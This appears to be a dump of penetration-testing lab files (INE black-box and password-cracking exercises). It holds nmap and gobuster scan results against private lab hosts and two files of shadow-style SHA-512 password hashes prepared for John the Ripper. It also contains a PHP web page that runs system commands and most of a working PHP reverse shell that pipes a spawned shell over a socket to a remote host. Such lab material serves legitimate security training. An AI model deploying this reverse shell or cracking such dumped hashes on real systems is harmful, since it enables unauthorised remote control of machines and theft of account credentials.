OS:%TM=6036E544%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10B%TI=Z%CI=I%II OS:=I%TS=8)OPS(O1=M4E7ST11NW7%O2=M4E7ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7 OS:%O5=M4E7ST11NW7%O6=M4E7ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120% OS:W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S OS:=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%R OS:D=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W= OS:0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U OS:1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DF OS:I=N%T=40%CD=S) Uptime guess: 0.004 days (since Wed Feb 24 18:40:21 2021) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=258 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 56.01 ms 172.16.64.166 Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Feb 24 18:46:12 2021 -- 4 IP addresses (4 hosts up) scanned in 122.68 seconds ================================================ FILE: ine-labs/black-box3/alive_hosts.txt ================================================ 172.16.37.1 172.16.37.220 172.16.37.234 ================================================ FILE: ine-labs/black-box3/dot220/gobuster_scan.txt ================================================ ===================================================== Gobuster v2.0.1 OJ Reeves (@TheColonial) ===================================================== [+] Mode : dir [+] Url/Domain : http://172.16.37.220/ [+] Threads : 10 [+] Wordlist : /usr/share/wordlists/dirb/common.txt [+] Status codes : 200,204,301,302,307,403 [+] Timeout : 10s ===================================================== ===================================================== /.hta (Status: 403) /.htaccess (Status: 403) /.htpasswd (Status: 403) /index.php (Status: 200) /javascript (Status: 301) /server-status (Status: 403) ===================================================== ===================================================== ================================================ FILE: ine-labs/black-box3/dot234/for_john.txt ================================================ elsuser:$6$MGsPjrt7$hBUzryEWeYdgKvj4MO0v7y0JJ6TxH1oXw4vHCXzG5kZOv8i4ejvbXUM3jkBuymRet9jfQ53hU806p8ujcuuQr1:17515:0:99999:7::: test:$6$kDmCF0O1$i7.RLl8NmxNCgB2jCGHgmGYV0TcVoaAeTuseohJ5Z71okk/J1N4owqfpuHjmfqAHSxx2MAPezfc8OHy.SRodM1:17983:0:99999:7::: ================================================ FILE: ine-labs/black-box3/dot234/gobuster_scan.txt ================================================ /.htaccess (Status: 403) /.hta (Status: 403) /.htpasswd (Status: 403) /index.html (Status: 200) /server-status (Status: 403) /xyz (Status: 301) ================================================ FILE: ine-labs/black-box3/dot234/index.php ================================================ "; echo "
"; system("ifconfig"); ?> ================================================ FILE: ine-labs/black-box3/dot234/revshell.php ================================================ array("pipe", "r"), // stdin is a pipe that the child will read from 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 2 => array("pipe", "w") // stderr is a pipe that the child will write to ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Can't spawn shell"); exit(1); } // Set everything to non-blocking // Reason: Occsionally reads will block, even though stream_select tells us they won't stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port"); while (1) { // Check for end of TCP connection if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } // Check for end of STDOUT if (feof($pipes[1])) { printit("ERROR: Shell process terminated"); break; } // Wait until a command is end down $sock, or some // command output is available on STDOUT or STDERR $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); // If we can read from the TCP socket, send // data to process's STDIN if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } // If we can read from the process's STDOUT // send data down tcp connection if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } // If we can read from the process's STDERR // send data down tcp connection if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); // Like print, but does nothing if we've daemonised ourself // (I can't figure out how to redirect STDOUT like a proper daemon) function printit ($string) { if (!$daemon) { print "$string\n"; } } ?> ================================================ FILE: ine-labs/black-box3/dot234/scan_xyz.txt ================================================ /.hta (Status: 403) /.htaccess (Status: 403) /.htpasswd (Status: 403) /index.php (Status: 200) ================================================ FILE: ine-labs/black-box3/thorough_nmap_scan.txt ================================================ # Nmap 7.91 scan initiated Thu Feb 25 20:05:44 2021 as: nmap -sV -n -T4 -Pn -p- -A -iL alive_hosts.txt -v --open -oN thorough_nmap_scan.txt Nmap scan report for 172.16.37.220 Host is up (0.057s latency). Not shown: 59238 closed ports, 6295 filtered ports Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html; charset=UTF-8). 3307/tcp open tcpwrapped No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=2/25%OT=80%CT=1%CU=44103%PV=Y%DS=2%DC=T%G=Y%TM=603849E OS:2%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=2%ISR=109%TI=Z%II=I%TS=8)OPS(O1=M OS:4E7ST11NW7%O2=M4E7ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7%O5=M4E7ST11NW7% OS:O6=M4E7ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y% OS:DF=Y%T=40%W=7210%O=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD= OS:0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=) OS:T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G% OS:RUD=G)IE(R=Y%DFI=N%T=40%CD=S) Uptime guess: 0.002 days (since Thu Feb 25 20:05:06 2021) Network Distance: 2 hops TCP Sequence Prediction: Difficulty=257 (Good luck!) IP ID Sequence Generation: All zeros TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 61.21 ms 10.13.37.1 2 57.49 ms 172.16.37.220 Nmap scan report for 172.16.37.234 Host is up (0.061s latency). Not shown: 57710 closed ports, 7823 filtered ports Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE VERSION 40121/tcp open ftp ProFTPD 1.3.0a 40180/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=2/25%OT=40121%CT=1%CU=36035%PV=Y%DS=2%DC=T%G=Y%TM=6038 OS:49E2%P=x86_64-pc-linux-gnu)SEQ(SP=FF%GCD=1%ISR=10F%TI=Z%II=I%TS=8)OPS(O1 OS:=M4E7ST11NW7%O2=M4E7ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7%O5=M4E7ST11NW OS:7%O6=M4E7ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R= OS:Y%DF=Y%T=40%W=7210%O=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%R OS:D=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q OS:=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK= OS:G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) Uptime guess: 0.002 days (since Thu Feb 25 20:05:06 2021) Network Distance: 2 hops TCP Sequence Prediction: Difficulty=255 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Unix TRACEROUTE (using port 40121/tcp) HOP RTT ADDRESS - Hop 1 is the same as for 172.16.37.220 2 58.71 ms 172.16.37.234 Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Thu Feb 25 20:07:46 2021 -- 3 IP addresses (3 hosts up) scanned in 122.12 seconds ================================================ FILE: ine-labs/bruteforce-and-password-cracking/alive_hosts.txt ================================================ 192.168.99.22 192.168.99.100 ================================================ FILE: ine-labs/bruteforce-and-password-cracking/for_john.txt ================================================ root:$6$NMfSi/bG$y9j8uMu4glpLudMRvzznUZ5h30jlobtAJGZYRaa64pdKy3i1WLTnmPPWUxfPdZwJKReFPU/zBo8HRpD.RAkrG1:0:0:root:/root:/bin/bash daemon:*:1:1:daemon:/usr/sbin:/bin/sh bin:*:2:2:bin:/bin:/bin/sh sys:*:3:3:sys:/dev:/bin/sh sync:*:4:65534:sync:/bin:/bin/sync games:*:5:60:games:/usr/games:/bin/sh man:*:6:12:man:/var/cache/man:/bin/sh lp:*:7:7:lp:/var/spool/lpd:/bin/sh mail:$6$jLhDRY5M$MJPM2mmM1khh8l0taxORP7oNn4jmwHAOLWZij5DacV25Hzj1ryykobxGlprlgaCXg/PGV2Po34JF4HgPv8roQ.:8:8:mail:/var/mail:/bin/sh news:$6$7pnXYnUf$F7t6t4A6rQf2z/ycnPuEdzMH9RGB5W0OFL420eKvp/s/SK3KaD6EM/gDNzhL9YFCthi7JVavBa8/nJCxX3XZW0:9:9:news:/var/spool/news:/bin/sh uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh proxy:*:13:13:proxy:/bin:/bin/sh www-data:*:33:33:www-data:/var/www:/bin/sh backup:*:34:34:backup:/var/backups:/bin/sh list:*:38:38:Mailing List Manager:/var/list:/bin/sh irc:*:39:39:ircd:/var/run/ircd:/bin/sh gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:$6$KRss6ftU$c/nB9QsK0iZ0zj8o6VmArcgiuGZ4oOjlLeCDYioV/rrcYYtuE/xkvhdDYvRtlydkFjvlqOXdKDV/0o6fA32Qt.:65534:65534:nobody:/nonexistent:/bin/sh libuuid:!:100:101::/var/lib/libuuid:/bin/sh sshd:*:101:65534::/var/run/sshd:/usr/sbin/nologin mysql:!:102:104:MySQL Server,,,:/nonexistent:/bin/false telnetd:*:103:106::/nonexistent:/bin/false sysadmin:$6$Sje/FZov$s6OBgDRso6O25TAo/K62bmuUjGI7po0yaa5y7n4agBKIFywDyleLs2FFNlXJiAgROHN4VD/WkfEFYIXcH9QPW1:1000:1000::/home/sysadmin:/bin/sh info:$6$b7FyMcC/$Xq.S9rAti5XfKvNR8DK2U0hCusjKeqNBGxrm0W9OvfA29gg68kKRkTyut6rLIf0ib4rLilPg6uiSqCUOuoYFU.:1001:1001::/home/info:/bin/sh support:$6$5UCqb4PI$080lZhjRESgv4pvv3eYze/PQFkEzIe//QBAgX4383cxPfX4B7hwsPP5d.vEOp49Nep015ISQCkD1SV.b.CeV0.:1002:1002::/home/support:/bin/sh abuse:$6$wew6XAFC$bRWpMBzLUx9vps5kW8zBJlHh7y7TodfdNfClkmlTEIcs31q9TQR1nPnGYp4GO4fpcOTs/H8Ui62lFoywXMjSs.:1003:1003::/home/abuse:/bin/sh admin:$6$u145Czfw$8UNRyCdVRM5BpO6wMZBOhJJA4tXLexxwQJhGLbJbD0FUOBWg.V/ybl6BNQVr4er3Gghg8gymvUqu1fMWqLs3V.:1004:1004::/home/admin:/bin/sh postmaster:$6$TNSdQqc8$Pij0H4TXEH6.i2tpomznu0uY9UFss/wG6xs1qsYQQSJ0YZNB/dBDkmq9I3O1regCsFgS9r7jSGq0GG7eIcqtK1:1005:1005::/home/postmaster:/bin/sh chris:$6$ZAY5sjcZ$htURsPqIyO4tpNUq12v2GDgAXe4oGVLYPQHDpVn7TMgLm8MP7g5hpZo5NitjHQfqvzB0dptX.fR0ciN6kkWeA/:1006:1006::/home/chris:/bin/sh webmaster:$6$KLM4wfkU$ZYsO.eQu2qXMfpQaSLzjgJn0dBfyiPRrb4xKT8cUWbaVI.psHzgPuWpkXiwKKWrqfSVCceQBuDVwFNQwH6qWS1:1007:1007::/home/webmaster:/bin/sh mike:$6$HZRL7RJz$PanyrCDQAvupUzoQ/SjtY1pp4DHQE4p7sVfvh6oZNbAlgUQBIf9R6TMW3wNV4976ngBUhp.39ZKbPwMYf2vsU1:1008:1008::/home/mike:/bin/sh steve:$6$gDpnLZEp$fd9Cptcb9W2lIYMIP/YTgmT4t2syNr99LWNmdemNdhKOpAQ3KnHMR6/BRtwyKJw2ASYWlM612anHKhT7DEua31:1009:1009::/home/steve:/bin/sh dave:$6$ye9cmjcs$WwHt5jEfmA3ONfKpD8YjLu2bReTpNoDByFdvfYCHD81609nrgkXEq8iV12LundO8a5oUW9h3HN4m0GYLKHM4W.:1010:1010::/home/dave:/bin/sh paul:$6$dJKby9gL$YOeP.Ct6VQjxDDptfdvsTjgZEuvoIzhKua8lbn9G/BAQZ5zxNMSaeTAvQYF4Tk3MR6VVmAKrEx86LC2pXmJ4o/:1011:1011::/home/paul:/bin/sh peter:$6$vMrS1QqI$rY7HpdXf1T2YRXcryJf7ubn98vsPD5aNduivE3biK.ExHmO1bjhn3UlW4wX2B9PPUTiNY49N88jZGKXUr/Yu3.:1012:1012::/home/peter:/bin/sh matt:$6$WPIf46Nd$/xQQomUKt1rkbWVDMfqJsvPQStDthciv8OwXgPQyTos8Yz3YTlP8WTwWPKyWauiYP6/EiBtAW3LhaBXo3LTXQ.:1013:1013::/home/matt:/bin/sh jobs:$6$fVNXa4IX$9CCRbwgJpfmQTUCTEBb9tqI0ze1vkSbMUUOusWxnH709pyzTCWdRTBtzViTuECSJBwxZhDwwjZdl7f7rtiAYg.:1014:1014::/home/jobs:/bin/sh joe:$6$xD.dth1G$g5u/t/SnuBZCprxXo9CogU5AXcaEtWglhu0nzxZzJTimkobFgI97xCR0p66REWXfWDZ.z95SeWoGPswT0j8wU1:1015:1015::/home/joe:/bin/sh user:$6$nytxqfYV$.ysNgYy5wAqynOjSAt8j7wKqDVwMjhhMI/5NQZohVKtwtZjtoSHSgxhT3MkGUvP5O0INCRZihD34Dz0wB2KCQ/:1016:1016::/home/user:/bin/sh eric:$6$VuEU0lI9$VCX/Tg6mxXY7wHHoCGQmw8syH39n6wrmUVgChfTd6I0Yt7Un7SFukxR0hhC2NHl6T7Fumr8hVwvML5DMF.Ua./:1017:1017::/home/eric:/bin/sh dan:$6$zVKkCXse$o07lxPMPnWaHQfbj6s/D23pJNzhLsKi1WGGlsVifSIXdYdQ0pCbl0Rjn/JV83HI4f0lDjBGWLv92gSeBdqCzZ/:1018:1018::/home/dan:/bin/sh brian:$6$o1kRvK4f$6kx2GgKATEjqgF/Ne5H3EEGBUMz/2zZwVv3kTCr7wnxqN7eKkkBATmz9Ye3C6QW/MQRW.9F6MHSGvJKnA4uFG1:1019:1019::/home/brian:/bin/sh michael:$6$1yCWFuPq$OiVnd4GHG/8bMLzLyWVpV47WAf7r9LYzTfGLSKI02.Ubq8YK/QsSi7EuXRM7cPC5IH9HpSkYWJQBbOUZQQHYt.:1020:1020::/home/michael:/bin/sh sales:$6$PsA1.Gfk$zowvm.gcO7raMNmAJ8fDLjKybTUanVmVNld/k5S7gMrwq43Q1jO2MQ/dGhNQTsCNrC2.Vwjt3/D3JKKNHJbX/.:1021:1021::/home/sales:/bin/sh nanog:$6$FDvdWcSH$F9T5azU4LovIyNB7wX0htrH74TJ46iHmn3QjI8lgQEKVQDeQ6Kd1skimbuTbE7.L7bl9xO7j/GpdiQp2m4c9d.:1022:1022::/home/nanog:/bin/sh jeff:$6$6hWz2ZU6$xcj.w/GvzUWwqmpE5CVAX8pWrW/92yi/13BKzu31oH80P7KJ2kKr8rpRgMkjuIO3GjHdGg1qmYxkvNcwubsMC/:1023:1023::/home/jeff:/bin/sh alex:$6$JyMZO.bE$h0b.97PuMtRnim8GRTiWbqxNIvLeiQ12dBTDyufyaClGhIRHnSaNQVdqFMSDY5f.qpGrk0rTxHQ8Ba8zMdk5I.:1024:1024::/home/alex:/bin/sh scott:$6$LawsHaww$YJJd3lCsV45nty1gHPUp2PIwC9ezfZ8R7s4X4cq16XeiNg34aD.ydJZxG09Gfbv4HhH.BUeCDe.Zg4KDxvccV/:1025:1025::/home/scott:/bin/sh jason:$6$fvuvc5Jr$Rtbo0pfPs4sgCreQSOKdOy2Xes8ZpGaWpRzau/zT0Fe2PfY895x9FGZUT9OlTJvRH73wuLI1DzkqVq46M8MCo.:1026:1026::/home/jason:/bin/sh bob:$6$O9g8kRFd$n4qyO7Pn0e0q8.JPhoszE9CT06lheE4PcMaHhB.VXQeWlsAKWoSHaOlI8QDBb0Tx9wKuuyTKsbTE7w6Znw2Uy/:1027:1027::/home/bob:/bin/sh jim:$6$RoQAB6qb$J6ku0OnN9AW/rlGDogQC0a8mHlM5SEpLJTvpRRYr1ozJ.1tpa14MW/txPzxJM0aDehqIskDrPgeu2GNAQriVx1:1028:1028::/home/jim:/bin/sh adam:$6$SMfCr27F$ZsSxV5bja0friZIyeaVwKhOta1Kde4X8Lk6HrqCWPA1Nm7TpvsoLZh1qHz/tPJSp6l/LzDIn7lOkGBC4HuD6E.:1029:1029::/home/adam:/bin/sh james:$6$qEJW3BIW$c8Zo6o0MABzuSLQu5Db6wFZAkNliAVC/VM4NHVu5Sd2mUb.xBIUbuvQLWbbXf6KPgtNhuzPdGrey45LtRYVSP1:1030:1030::/home/james:/bin/sh tim:$6$JXamlohb$Az7LB/X.bm7J4QU//XHE9W.OGZ87wi2RVRHAWrSYxX75lrZn7vkwSGxBp/pZEZLGUJhnzE86lkIb.VPkst2Ql/:1031:1031::/home/tim:/bin/sh majordomo:$6$NPJJ2uUo$ct2R6b.jg.WK4dAw2wzdDgxsuHg5LUpdvz9owz.CgAb6L5o/IKsOZj6rbmaWyolhanoOxKrdsmn4.Bysh0hGo/:1032:1032::/home/majordomo:/bin/sh daniel:$6$8mksQQtb$xXcaS/KPANmdotnWrHa26J4KUaQHBQSxy5FvniWecSyIpvZtZrm9ZMCG/x0WKXzo0NOHwS6yoKYUoRwB4BDwh1:1033:1033::/home/daniel:/bin/sh ben:$6$2iH7dNAN$zgpUqA9ZXBRRDkJuv1TrAulRGQplR5t98Gx9js77s6quNEtU/hXZLHKryYZtDZO8MJjO.ZUzs8k9QpKrRBGX51:1034:1034::/home/ben:/bin/sh hostmaster:$6$V5c3cv9Q$S0JMkvGW7qokXYf0lEGAw8kY29s1VKKcSz16N2fvbJHML5BZR6vZofyTGUMNGVJ1k.RNjHYdmOqdId0Ep0wO61:1035:1035::/home/hostmaster:/bin/sh tom:$6$JWml6IwT$UbW187dhuYbtw983jO9EqT/m6qYzT/Ovvw9lcIpBsL./g7r6SJTDFsupsnNoavyfQ3FE2tq0tr4byVdsvxxu40:1036:1036::/home/tom:/bin/sh snort:$6$O/joFTvS$zFDDPUYVY3qQq45i6FgZRFx9dQdTTkWoIKE2IsoBw5FrzZGoKiLS82FcMCCr0bouOD0cX/hYswDjKD7UNN4v/1:1037:1037::/home/snort:/bin/sh andy:$6$vvz6/jIM$KpRwLWVb.JQZd9A/gAgmV/jdyXUr0FzU4CwOpzxVI7/7qd9pt6AFdSSMokJWL.WC7w0yFuITvyoE7iSyy4Ed6/:1038:1038::/home/andy:/bin/sh andrew:$6$xrxK.ZMk$SbnalSKc8SRQUuZadGTGhClUF18xjC4HTWOPlcT2D5wgRkd.ou5zLE7dyM/bBI0M9vc6WYQjQJ7Teotmc3dJN/:1039:1039::/home/andrew:/bin/sh greg:$6$M6b5jpj3$1toGupgM1bdko05fLUrnUdDwwdB2nbK3pvpgpA.cK6dI8ZyBW0PnHX29mwK6qV4gGUZaGZGpUHCUZHQPXTW87.:1040:1040::/home/greg:/bin/sh robert:$6$yfsl9IAe$5ZtjNOyf7uuOo4a.Q7G.96z67KB9BHI.9ri7zeqS6HFk4RjtePvXGdD5iZCK4EJUBsyjy8KYe0NsSEz4S1jZK0:1041:1041::/home/robert:/bin/sh martin:$6$UMJrcI1d$ljAGjf2Ysu6WZj6OonyBqdWgC1JGBrg/cSkwA8P0AYuFUi2Nj3V8jTz77HSBCgNdBmi8Z0DpU40lkpJoKCVYi1:1042:1042::/home/martin:/bin/sh rob:$6$KynzgNNI$CRqz5ZCoxyw8Iz3Y4DavYHefo8e3CdPxaJAKmA8G7fVioFb3imRVsOQO9fvR94aOSywrCHx8JRZ8rox4jqVCk.:1043:1043::/home/rob:/bin/sh stefan:$6$5UNbMPFr$S9zKaPdjN3WF5XdvcBZrc1RV.bk/ufmZgiNAr8OsnKtZCPqFRtQ.g2ewAbQ40ARubCMQD0fIdQSL3LB4JBBuK1:1044:1044::/home/stefan:/bin/sh sam:$6$4IQ98NuP$Q7Kd1uQhbVl4rv9yPzn51rA8U1stcC9zCUu/o83v959HNcMXdEyZ39Ec8/cTq89v/fes.lwpozekSK16JHLr3/:1045:1045::/home/sam:/bin/sh linux-kernel:$6$iZd1ERbp$wO5U7YmvpfM8vuJX2er3jI7JPUTv7ahoypgc2n1/CWQr9yyf7CyFcxUBj9T2tEx7KR9x3Z6/C5Q3wxumJKMuu/:1046:1046::/home/linux-kernel:/bin/sh jonathan:$6$JN51qUeO$YRkPN8gR43gmtTEg0uycZaz3SOOwT37g17tt8bB/Fi/Xr/dKPsUhaWfOjZ1uNrJg7sL4z9srGe.zWP0B1tfQc/:1047:1047::/home/jonathan:/bin/sh erik:$6$Ib9a2n66$vfEKmQ0LO/sV3M4PsanGWx3ATuHNFZ/FysOYhKAdG4PdXeXiLackGxLuNs7qG4KOAVVhyLAM.99pP4j8sJ3Vr1:1048:1048::/home/erik:/bin/sh orion:$6$EnZP3LwQ$pDR2Jny9KIPDEmoB.jzhp38Ik5FyG4DWzewHoEePxdCBzFfBWnIUQNXDNup8U2IoAiUC/jaO/i9SpStI8ZgIa1:1049:1049::/home/orion:/bin/sh doug:$6$kV2vj2S6$eKQyp76DlZbo/tgLKyjtLQf.G86BY9oVkfscbIrWwCYRqd.zJnLIOJPrGJJSvK59O.OpUc5L8vo.1yet/IndA.:1050:1050::/home/doug:/bin/sh spam:$6$b4.yukui$byGJM8hTw11KmLes6YSfvo7IKfkg5HYtll.JOVFJgM9IObO6NE7dpLhTiHxgLLCPtXa0wbwxPAlYTtPsrCnLP.:1051:1051::/home/spam:/bin/sh nessus:$6$5b.qaMaF$MSnDGsA6Yo7LzABXWXtdHb5HruaehdkrLbdv9Yg.lQoG9nC6patjwPqFuR1G2CSslqIZkBbZst7rhCeJXr3Z.0:1052:1052::/home/nessus:/bin/sh bugs:$6$cJfe9yB0$DkgkyIHYGOFQ9hIF6A28Da0niQBq6Yn9PXjNKAJEK7y0sdEc6v9KSpW8DEBXg.lO/MCgpHuuAbbcAQfYs36gG/:1053:1053::/home/bugs:/bin/sh rick:$6$SFXj7ADA$qu3mlQDjIwVNzC.3JkUKUS2Hp7aeC1Zg5GP1h7nM5BmCTsJ7d1ckSF3ErjPbpZFIqNCz6NAgy1F76PmjeJz.x0:1054:1054::/home/rick:/bin/sh josh:$6$KU1UUsAZ$ac7T8xBfcLxXmb/qRNuEKrfZy1G/kcqsJzWJ93/qTa08itf31x5/pcdVHj30MKXYh/poaN8fOlKkZR0f2xrr3.:1055:1055::/home/josh:/bin/sh research:$6$m0nQbAaZ$FKL3XBWkT3GEv0UVn6WTHssjyjou2/33f8BKE4voI7HWU9FdF1hABlyQAqAYhJOfRuQpuZzSBcJVvCMtMX6D51:1056:1056::/home/research:/bin/sh craig:$6$movXAzDc$E4sBocqFLzY9iif37.1VF4uuOr5QsI7ZwrnkTM.ITDebTuEc5od/87suR9fBPGuEm4HU4pUf324z3Pxb86Sk9/:1057:1057::/home/craig:/bin/sh sven:$6$L2Ac90qT$4NWVht13koXx1Zewnoq.aqh7584NpDNToIa41Qqbc94hwitYtA5pXZF0ZwsKRUIQ4bf0Z.5Tm9Ue5BLbw1y/61:1058:1058::/home/sven:/bin/sh gary:$6$mbC5nX5S$baJcUKoownjBSnz6/wuXNK75gvtKZ5dub4BZwpjP1YvgkjooQ8GRbZpR4fAo0zevFiGWONgHjDkLKYxDiYIST/:1059:1059::/home/gary:/bin/sh brett:$6$qd2dCjHj$6qWUTOIG5OmP5OcN3.cMfDr24ScByDakPNIrRZjZqcqaiHlBuFbGvDsGTIAPizkZGrIvuH7gnhAgt/hg3f9Gz/:1060:1060::/home/brett:/bin/sh Security:$6$GPayTWXW$sSarI38ETnIzRUSXgEXambmN8FNcCuUiDqnMYeeKYzavwk0Pefw5VafzCG9jpgTnzaWrY1QlbpkNOy4c22yRu.:1061:1061::/home/Security:/bin/sh torvalds:$6$UdO6LNso$sIErGAh.8NWiPZyarP4EqM15zKLy8ZDT4C1HixADAOHJ8MojNHFAJa33jx9qpixPiUpgibhKJpKb4gY/YgjSx1:1062:1062::/home/torvalds:/bin/sh nate:$6$cic0vUV.$/zZv9r8/5C8D7HkGlymqTr1t248kTvSScQfyxnYldFQPQplIbfrn2R61ZHu.t0ImjP38YyMzw1Wbftpg8p9Xf0:1063:1063::/home/nate:/bin/sh larry:$6$C1wU6KtA$XgPBkqQLm6j2QdkDfLNyyQC90Fck6.EKAKxwD0DVeHm2m8k3.r4yLB0.lqa741PXTOYpq.gZPt83GsQszfK0G1:1064:1064::/home/larry:/bin/sh adrian:$6$.wQ4ogUx$xRH9xkYVsVAKswluFPaNZj0c/CxVyzpdBkQaZ1rpSU8IEzub91YTwTDrEJUvWnCL9K.Sfm81/lQhLY1VpbX8g1:1065:1065::/home/adrian:/bin/sh test:$6$IKTyMZxA$C6g0kSQ7eWmmRQrB7jlFMvS4oPU48tE18sJKuPxX0QSl9QlOXwwY3U.2aTpalC3i6qcPbLSbjav0SjmlxplNp0:1066:1066::/home/test:/bin/sh tech:$6$OTt3okCG$lrKSF4KyxVZgWlJ3uGgBRmMkChdZ8hxHyPWXS2/a2Vlq129Zq3jCZVINrW9nRG20TNsqI0MN07e88jJTGVGjd1:1067:1067::/home/tech:/bin/sh someone:$6$Zk8ylIKZ$rFllR3qlbmirrkgwRppG0HaV9ppHK0/jHWTVeqsX3oxFKjnzgg.DnS7CMXas151xCk51CmUV4dmeL17cJ3nIZ0:1068:1068::/home/someone:/bin/sh kris:$6$MIsyuc0b$PcN7IMMSL7Fjla0C7IayevAuLD6iQmkvGX2rIxcx0VAGr7LACwtchRrE3AcZO5yTr3MQlZac9q2tvJcQjAUiF0:1069:1069::/home/kris:/bin/sh andreas:$6$rsAbNhaA$CAbbNGghKugILQ6glWV0tEzeVbhoMB3S92Y155EHMaGeZsi6TpCIDVjw8aWlmWGIQAdB28OLQMKgWbYEAEz8x1:1070:1070::/home/andreas:/bin/sh akpm:$6$00w49s/D$wpRXPoKKRN4rNp11hIPCJ0v/C6BPpI.GZeihVlSfpvVd0s0zqglwb.blyf.hLsgrIbKwDI1s0Yvk6.FmArahS/:1071:1071::/home/akpm:/bin/sh stephen:$6$ssSU27er$LdCIfDEwxxrPHZLILJoBz3Zg.wWEaVgUfxf7pd8TQXtF4d1nOtIkUav2TMY1xrbyhCutzShgIkQTeopPCwlRg/:1072:1072::/home/stephen:/bin/sh password:$6$hy0ECcK6$FdtsdPMLymN9GYJFaWsCq16yyMY05Whd41qODKrWpSmwR1QiiOPcUtLutMJtpWkDv/AqUivlU2NChCrUZMini0:1073:1073::/home/password:/bin/sh oliver:$6$Iv.78Pvl$x4i0h9HyFfRo5mLan7JhSIS.5Yn7W5shQQpqHMC5ToXdUTWrUYDjgIZ1DtwTU4YRUh9O6QeR84k.i.4NSfX.51:1074:1074::/home/oliver:/bin/sh blaisorblade:$6$fI69BmWc$wrckcetwa5aKTbP0QZU7mJ3QD2yATRzag31BaCYUE0c/ESYNf1ivKrD/VsDY3D/PuIs1pup.VYm8OkwDnrUd6.:1075:1075::/home/blaisorblade:/bin/sh roman:$6$pyat9UWx$t1ZZZGJ56DMNfl9IIWmT4DNeAQ1/RngqhGS232FytUAEtLn.duPbCoykRkfUiP2XrpV3V8Qh7wejTDsqyrXFq.:1076:1076::/home/roman:/bin/sh postfix:$6$rMJQQZvk$EsTIxQbNZAgsETizbhaK/JUX0SAvWdXuVi0lNH1qI3kFy98e08XpH1c2fEOlCIlekhyymCiDVTP03Y/fo46pa.:1077:1077::/home/postfix:/bin/sh 